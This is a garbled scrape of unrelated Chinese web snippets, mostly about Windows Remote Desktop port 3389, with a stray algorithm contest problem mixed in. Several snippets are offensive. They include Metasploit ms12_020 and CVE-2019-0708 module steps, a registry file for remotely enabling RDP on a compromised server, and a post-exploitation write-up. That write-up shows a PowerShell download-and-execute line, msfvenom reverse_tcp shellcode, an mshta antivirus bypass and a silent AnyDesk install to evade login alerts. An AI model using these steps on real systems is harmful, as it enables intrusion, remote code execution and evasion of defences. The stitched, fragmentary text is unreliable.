直接上脚本吧,多线程,加了队列,然后尝试用不同的banner头去连接1-65535端口,如果开放,总有一个是的,当从注册表无法读取RDP端口的时候。 #!/usr/bin/python # coding: utf-8 import socket import binascii import sys import threading from Queue import Queue def verify(sock, port): while 1: buff
3389: [Usaco2004 Dec]Cleaning Shifts安排值班 Time Limit: 1 Sec Memory Limit: 128 MB Submit: 102 Solved: 保留一个起始时间最长的即可,于是我们开始进行贪心 1 /************************************************************** 2 Problem: 3389 phile神犇的离散化点子么么哒) 1 /************************************************************** 2 Problem: 3389
https://pan.baidu.com/s/1Rt3ZFXY0sOD5okeb9VI3_A
iis7远程桌面小编在开始讨论什么是端口之前,让我们先讨论一下什么是端口?我经常在Internet上听到我的主机打开了多少个端口,这些端口会被入侵!或者说“打开那个端口会更安全吗?”另外,我的服务应该对应哪个端口! “哈哈!太神奇了!主机上怎么有这么多奇怪的端口?这个端口有什么用?
search ms12_020 use exploit/dos/windows/rdp/ms12_020_maxchannelids set rhost 192.168.222.1 exploit
获取Ubuntu系统的IP地址,用Windows自动的远程连接工具(mstsc.exe)连接
题目背景 Gauss消元 题目描述 给定一个线性方程组,对其求解 输入输出格式 输入格式: 第一行,一个正整数 nn 第二至 n+1n+1行,每行 n+1n+1 个整数,为 ,代表一组方程。 输出格式: 共n行,每行一个数,第 ii行为 (保留2位小数) 如果不存在唯一解,在第一行输出"No Solution". 输入输出样例 输入样例#1: 3 1 3 4 5 1 4 7 3 9 3 2 2 输出样例#1: -0.97 5.18 -2.39 说明 本来想深入的研究一下矩阵来着,, 结
"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389 如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接
要登录到这台远程计算机,您必须被授予允许通过终端服务登录的权限。默认地,“远程桌面用户”组的成员拥有该权限,如果您不是“远程桌面用户”组或其他拥有该权限的组的成员,或者如果“远程桌面用户”组没有该权限,您必须被手动授予该权限。
3.打开攻击机的终端输入msfconsole,再输入search ms12-020查找这个模块。
今天在服务器端的攻击防护日志中看到3389端口被攻击了,查了一下3389是服务器远程端口,是服务器远程连接的默认端口,很多黑客都针对这个端口进行扫描,那如果修改远程连接的端口呢? CurrentContro1Set\Control\Tenninal Server\WinStations\RDP-Tcp],到PortNamber,然后右键–>修改,选择到十进制,你就会看到现在您使用的端口号(默认值是3389
当我们拿到管理员账号密码的时候,我们需要利用3389端口远程桌面连接到对方服务器,发现3389端口没有开放,此时需要我们远程开启目标服务器3389端口。 新建文件 3389.reg 内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] "PortNumber"=dword:00000D3D 此时目标服务器 3389 端口关闭: 上传3389.reg文件到目标服务器 提权之后运行一下 3389.reg 。 regedit /s C:/www/3389.reg 成功开启 3389端口。
今天给大家分享一下如何使用ipv6进行远程桌面3389端口登录,具体的教程,如下所示。 服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat -ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING 848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的 3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
解决方案: (1) 使用Meterpreter的portfwd命令将目标的3389端口转发出来后即可成功绕过IP安全策略,因为最终流量是走的它本机,如: 127.0.0.1:3389>-<127.0.0.1 添加IP安全策略: netsh ipsec static add policy name=阻止3389端口 添加IP筛选器名: netsh ipsec static add filterlist name : netsh ipsec static add filter filterlist=放行192.168.1.103 srcaddr=192.168.1.103 dstaddr=Me dstport=3389 name=放行 action=permit or block 添加IP安全规则: netsh ipsec static add rule name=放行192.168.1.103 policy=阻止3389 端口 filterlist=放行192.168.1.103 filteraction=放行 激活指定安全策略: netsh ipsec static set policy name=阻止3389端口 assign
翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。 ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。 0x04 绕过主动防御上线 测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。 powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。 1、生成载荷并编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin cat /tmp/shellcode.bin | base64 -w 0 2、配置监听模块参数 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 155.**.***.16 set lport 443 exploit 3、目标主机执行载荷 mshta http://155.**.***.16:8888/bypass360.hta 注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。 0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。 为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。 注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。 @echo off AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password choice /t 10 /d y /n >nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。 至此,全文结束,内网就不搞了!!!
记得之前在freebuf看过一篇文章,《Python黑客学习笔记:从HelloWorld到编写PoC》,应该是翻译稿~ 里面好像有一篇写到,python脚本转exe,免去环境的苦恼~~ 感觉大学都白学了C了,很多东西没有用C实现。 windows下的服务器环境上传nc或者其他的反弹shell脚本又显得很麻烦。 所以如果用python打造出一款简单粗暴,又免环境困扰的小工具还是不错的。 00x1 使用PyInstaller生成可以执行程序 python脚本编译成windows下可执行文件,它可以让你的pyth
新型BuleHero挖矿蠕虫变种利用端口爆破攻击 腾讯安全率先捕获近日,腾讯安全御见威胁情报中心再次监测到一款全新变种的BuleHero挖矿蠕虫。结合对该病毒发展轨迹的梳理发现,与以往披露的多个历史变种不同,这一BuleHero挖矿蠕虫“新成员”新增了 4899 端口(即iis7远程桌面管理工具,批量管理服务器,批量保存账号密码)爆破攻击和“永恒浪漫”及“永恒冠军”等NSA新武器。其内网横向感染传播能力更为强大。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 使用方法: 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如: c:\ 默认是3389。 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。(如果/r不行,可以试试这个) 使用此参数时,端口设置不能忽略。 cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr 上面的命令应该可以理解吧? 3,下载3389自动安装程序-djshao正式版5.0 说明: 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入
服务器端设置: 打开命令行 输入如下命令 netsh interface portproxy add v6tov4 listenport=3389 connectport=3389 通过 netstat -ano | find "3389" 查看端口映射是否正确 正常应显示如下 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 848TCP [::]:3389 [::]:0 LISTENING 848UDP 0.0.0.0:3389 *:* 848UDP [::]:3389 *:* 848 说明ipv6上端口3389监听成功 基本原理介绍: windows中的远程登录服务默认侦听在ipv4的 3389端口, 我们只需要打开一个ipv6的端口开始侦听,并把数据转发给ipv4的3389端口即可这也就是命令netsh interface portproxy 的意义 ----------------
windows系统是个人电脑使用较多的,其中内置自带的远程桌面连接,可以直接访问到另一台windows计算机上进行远程管理操作,默认使用是3389端口,也可以按需修改其他端口。 Windows 系统自带的 3389 远程桌面是使用最广泛的远程桌面,无需额外安装任何软件就可以使用,访问目标计算机操作就像是本地电脑直接操作一样,广泛用于远程办公场景。 -内网端口,远程桌面系统默认端口为3389,以实际来填写。-外网端口,默认生成,一般不用改,也可以按需修改未占用的。 附:修改3389默认端口为其他端口号如果是长期提供外网互联网上连接远程桌面使用的,一般建议修改默认的端口号,以提升网络安全,避免机器3389默认端口攻击。 远程桌面的默认3389侦听端口在注册表中指定。 若要更改注册表值,请按照以下方法使用 PowerShell 命令或注册表编辑器进行更改。